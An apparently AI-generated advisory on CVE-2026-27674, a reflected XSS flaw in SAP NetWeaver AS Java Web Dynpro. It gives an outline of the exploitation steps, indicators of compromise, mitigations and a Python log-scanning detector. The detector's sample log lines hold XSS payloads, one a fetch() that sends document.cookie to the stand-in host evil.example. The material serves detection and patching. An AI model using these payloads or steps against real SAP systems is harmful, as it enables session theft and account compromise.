CVE-2026-27674
SAP NetWeaver Application Server Java vulnerability analysis and mitigation

Overview

CVE-2026-27674 is a code injection vulnerability (CWE-94) in the Web Dynpro Java component of SAP NetWeaver Application Server Java. An unauthenticated attacker can supply crafted input that causes the application to reference attacker-controlled content; when a victim accesses the affected functionality, that content executes as client-side code in the victim's browser and can lead to session compromise. The affected version is SAP NetWeaver AS Java 7.50 (component WD-RUNTIME 7.50). The CVE was published on April 14, 2026 and carries a CVSS v3.1 base score of 6.1 (Medium) (GitHub Advisory, SAP Security Notes).

Technical details

The root cause is improper control of code generation (CWE-94): the Web Dynpro Java component does not neutralize externally supplied input before the application interprets it. An unauthenticated, network-based attacker crafts input that makes the application reference attacker-controlled content; when a victim opens the affected functionality, that content runs in the victim's browser under the origin of the SAP host. The described behavior is that of reflected cross-site scripting (client-side code injection), so although SAP classifies the weakness as CWE-94, practitioners should treat it as an XSS issue for detection and hardening purposes. Exploitation requires user interaction (the victim must access the affected functionality) but no authentication or privileges on the attacker's side. The Scope: Changed component of the CVSS vector reflects that the impact lands in the victim's browser session rather than in the vulnerable component itself (GitHub Advisory, SAP Security Notes).

Impact

Successful exploitation lets an attacker execute arbitrary client-side code in a victim's browser, potentially leading to session compromise, theft of session tokens or credentials, and manipulation of the application as seen by the victim. The CVSS vector rates confidentiality and integrity impact as Low and availability impact as None. Because scope is Changed, the damage is realized in the victim's browser environment rather than in the SAP NetWeaver AS Java component itself, which is what enables data theft and tampering with the victim's interactions with the application (GitHub Advisory).

Exploitation steps

  1. Reconnaissance: identify internet-facing SAP NetWeaver AS Java 7.50 instances (WD-RUNTIME 7.50) and their exposed Web Dynpro Java endpoints, for example with Shodan or Censys.
  2. Craft malicious input: build a URL or request to the vulnerable Web Dynpro Java functionality that places attacker-controlled content (for example a reference to a malicious script) in an input parameter the component does not sanitize.
  3. Deliver the payload: send the crafted URL to a target victim by phishing email, social engineering, or by embedding it in a web page, since user interaction is required.
  4. Victim follows the link: when the victim opens the affected Web Dynpro Java functionality, the application interprets the attacker-controlled input and the malicious content executes in the victim's browser in the context of the SAP application.
  5. Achieve the objective: the executed client-side code can read session cookies that are not flagged HttpOnly, capture credentials, perform actions on the victim's behalf within the SAP application, or redirect the victim to further malicious infrastructure (GitHub Advisory).

Indicators of compromise

  • Network: unexpected HTTP requests to SAP Web Dynpro Java endpoints whose URL parameters carry encoded or obfuscated script content; outbound connections from victims' browsers to unknown external domains immediately after a Web Dynpro page load.
  • Logs: SAP NetWeaver AS Java HTTP access logs showing requests whose parameter values contain script tags, javascript: URIs, HTML event handlers, or references to external domains (URL-decode the values, including double-encoded ones, before matching); repeated requests to Web Dynpro endpoints from unfamiliar source IPs.
  • Application: unexpected session invalidations or concurrent sessions for the same user account; user reports of anomalous browser behavior (redirects, pop-ups) when using SAP Web Dynpro functionality.
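To make the log indicator concrete, the following script is an added example, not part of this advisory and not an SAP or Wiz tool. It scans constructed access-log lines in Common Log Format, restricts attention to requests under the conventional Web Dynpro Java path prefix /webdynpro/ (an assumption: check the dispatcher path used in your landscape), fully URL-decodes each query parameter so that double-encoded payloads are matched in the clear, and reports which indicators each request hits. The sample lines, the hostname evil.example and the application paths are constructed; the real AS Java HTTP access log layout differs from CLF, so the line regex is the part to adapt.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Conventional URL prefix under which Web Dynpro Java applications are served
# (assumption: check the dispatcher path used in your own landscape).
WD_PREFIX = "/webdynpro/"

# Constructed sample lines in Common Log Format. Real AS Java HTTP access logs use a
# different layout; LOG_RE below is the piece to adapt. The first and last lines are
# benign; the middle three carry a plain, a javascript:-URI and a double-encoded payload.
SAMPLE_LOG = """\
203.0.113.10 - - [14/Apr/2026:10:01:02 +0000] "GET /webdynpro/dispatcher/sap.com/tc~wd~tools/Explorer?sap-language=EN HTTP/1.1" 200 5120
203.0.113.11 - - [14/Apr/2026:10:01:09 +0000] "GET /webdynpro/dispatcher/sap.com/demo~app/Main?param=%3Cscript%3Efetch(%22https%3A%2F%2Fevil.example%2Fc%3F%22%2Bdocument.cookie)%3C%2Fscript%3E HTTP/1.1" 200 4870
203.0.113.12 - - [14/Apr/2026:10:02:15 +0000] "GET /webdynpro/dispatcher/sap.com/demo~app/Main?redirect=javascript%3Aalert(1) HTTP/1.1" 200 4870
203.0.113.13 - - [14/Apr/2026:10:02:40 +0000] "GET /webdynpro/dispatcher/sap.com/demo~app/Main?q=%2522%253E%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 4870
203.0.113.14 - - [14/Apr/2026:10:03:01 +0000] "GET /irj/portal?NavigationTarget=ROLES://portal_content/x HTTP/1.1" 200 9001
"""

# Common Log Format: client - user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Indicator name -> regex applied to the fully decoded parameter value.
PATTERNS = {
    "script tag": re.compile(r"<\s*/?\s*script\b", re.I),
    "javascript: URI": re.compile(r"javascript\s*:", re.I),
    "event handler": re.compile(r"\bon[a-z]+\s*=", re.I),   # onerror=, onload=, ...; noisy on a parameter literally named "on"
    "html injection": re.compile(r"<\s*(img|svg|iframe|object|embed|body|meta|link)\b", re.I),
    "dom access": re.compile(r"document\.(cookie|location|write)|window\.location", re.I),
    "external URL": re.compile(r"https?://[\w.-]+", re.I),  # lower confidence: some SAP parameters legitimately carry URLs
}


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Undo percent-encoding repeatedly (bounded) so double-encoded payloads are matched in the clear."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_log(text: str) -> list:
    """Return one finding per (request, parameter) whose decoded value hits at least one indicator."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; a real deployment would count these
        url = urlsplit(m.group("target"))
        if not url.path.startswith(WD_PREFIX):
            continue  # only Web Dynpro Java endpoints are in scope for this CVE
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            decoded = fully_decode(value)  # parse_qsl already decoded once; peel deeper layers
            hits = [label for label, rx in PATTERNS.items() if rx.search(decoded)]
            if hits:
                findings.append({
                    "ip": m.group("ip"), "time": m.group("ts"), "path": url.path,
                    "param": name, "decoded": decoded, "indicators": hits,
                })
    return findings


def requests_per_ip(findings: list) -> dict:
    """Count suspicious requests by source IP (the 'repeated requests from unfamiliar IPs' indicator)."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for f in results:
        print(f"{f['time']} {f['ip']} {f['path']} param={f['param']!r} -> {', '.join(f['indicators'])}")
        print(f"    decoded: {f['decoded']}")
    print(requests_per_ip(results))
```

The double-encoded line is the one a single-pass grep for "<script" or "onerror" misses entirely; decoding until the value stops changing, with a bound so a hostile input cannot spin the loop, is what turns it into a hit. Treat the "external URL" indicator as corroborating evidence rather than a trigger on its own, and feed the per-IP counts into whatever threshold your SIEM already uses for scanning behavior.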

Mitigation and workarounds

SAP fixed this vulnerability on the April 2026 SAP Security Patch Day; apply SAP Security Note 3719397, which delivers the patch for SAP NetWeaver AS Java (Web Dynpro Java) 7.50 (SAP Security Notes, GitHub Advisory). Until the note is applied, restrict access to Web Dynpro Java functionality to trusted users and networks where operationally feasible, filter requests whose parameters carry script-like content at a WAF or reverse proxy in front of the AS Java (a WAF can block suspicious input but cannot substitute for the output encoding the patch adds inside the application), and educate users about phishing that could deliver malicious URLs targeting this vulnerability (Onapsis Blog). As general hardening that limits what a successful XSS can do, confirm that session cookies are flagged HttpOnly and Secure and consider a Content-Security-Policy that restricts script sources, testing both against the Web Dynpro applications in use before enforcing them.

Community reactions

The vulnerability was covered as part of broader reporting on the SAP April 2026 Patch Day. Onapsis published an analysis of the April 2026 SAP Security Notes and SecurityBridge covered the patch day as well (Onapsis Blog, SecurityBridge). GBHackers and SecurityOnline also reported on the patch day, noting the critical flaws fixed alongside this medium-severity issue (GBHackers, SecurityOnline). No significant independent researcher commentary or social-media discussion specific to CVE-2026-27674 has been observed.

Additional resources

Source: This report was generated using AI

Related SAP NetWeaver Application Server Java vulnerabilities (every entry has technology and component name SAP NetWeaver Application Server Java and CPE cpe:2.3:a:sap:netweaver_application_server_java):

CVE ID         | Severity | Score | In CISA KEV | Has fix | Published
CVE-2025-42944 | CRITICAL | 10    | No          | Yes     | Sep 09, 2025
CVE-2026-40128 | CRITICAL | 9     | No          | Yes     | Jun 09, 2026
CVE-2026-27674 | MEDIUM   | 6.1   | No          | Yes     | Apr 14, 2026
CVE-2025-42926 | MEDIUM   | 5.3   | No          | Yes     | Sep 09, 2025
CVE-2026-23686 | LOW      | 3.4   | No          | Yes     | Feb 10, 2026
